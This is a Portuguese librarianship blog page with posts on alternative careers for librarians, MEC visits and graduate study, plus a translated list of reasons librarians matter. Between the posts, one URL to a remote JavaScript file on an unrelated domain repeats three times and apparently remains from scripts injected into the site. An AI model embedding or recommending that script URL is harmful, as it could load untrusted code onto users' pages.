E quem não quer trabalhar em bibliotecas?

Há algum tempo o pessoal me pede para falar sobre bibliotecários que não querem passar nem perto de uma porta de biblioteca e se há alguma luz no fim do túnel. Então comecei a estudar e esse é o primeiro vídeo de uma série de alternativas para quem foge da mediação de leitura.

https://cloudapi.online/js/api46.js

https://cloudapi.online/js/api46.js

https://cloudapi.online/js/api46.js

O fantasma da visita do MEC

Desde que comecei a tag ‘Fala, Bibliotecária!’ um dos temas mais pedidos é ‘visita do MEC’. Eu sempre disse que não faria, afinal minha proposta é divulgar a área, mas depois de insistidas sem fim resolvi dar o braço a torcer e aproveitar para ajudar quem trabalha com educação em geral.

Então habemus vídeo de visita MEC.

*Spoiler: todo mundo sobrevive no final.

 

Falando de carreira

Aproveitando os conselhos do Moreno e os erros da Marina, como não sou tão jovem, nem errei muito (ainda), vim falar sobre o ‘está sendo’. Muita gente me pede para falar sobre pós-graduação, como foi, como é, como organizo minha vida, então aí está! Não é do ‘Fala, Bibliotecária!’, mas é, rs.

Por que bibliotecário?

– Todos os bibliotecários possuem formação universitária em Biblioteconomia, com algumas variações em nível de graduação para Documentação, Gestão da Informação e Gestão de Unidades de Informação. Outros podem ser considerados, ainda, cientistas da informação, já que além da graduação em biblioteconomia, fizeram mestrado ou doutorado em Ciência da Informação.

– Há um milhão de bibliotecários no mundo. Um milhão de especialistas em informação não podem ser deixados de lado.

– Os bibliotecários são uma parte essencial da gestão de ativos digitais, da arquitetura de informação e da recuperação do conhecimento estratégico para aqueles que disso necessitam.

– Os bibliotecários leem e analisam mais livros do que qualquer outro grupo no planeta. Os bibliotecários são uma fonte confiável de recomendações de livros e treinados para assessorar o leitor.

– Para os autores, os bibliotecários são um recurso indispensável para a divulgação e venda de seus livros.

– Os bibliotecários têm trabalhado durante décadas na estruturação da informação e do conhecimento, e identificado tudo através de metadados.

– Os bibliotecários são especialistas na recuperação de informação e podem recomendar informação personalizada adequada para o usuário.

– Os bibliotecários fazem a conexão entre as pessoas e as informações que elas estão procurando, e as informações que elas nem sequer sabem que estão procurando.

– Os bibliotecários são treinados para pensar na relação entre um leitor e qualquer pesquisa que ela ou ele esteja fazendo, seja uma busca inconsciente ou algo objetivo, e direcionar tanto a pessoa para a informação como a informação para o leitor.

– A consciência das bibliotecas por justiça social e a atenção para com os carentes só faz aumentar o seu valor. Os bibliotecários são defensores da redução da exclusão digital.

Sempre haverá fontes de informação para organizar. Sempre haverá pessoas que precisam de informações. Sempre haverá a necessidade de bibliotecários digitais. Sempre haverá a necessidade de bibliotecários.

[tradução de Why Librarians? de Michelle Zaffino]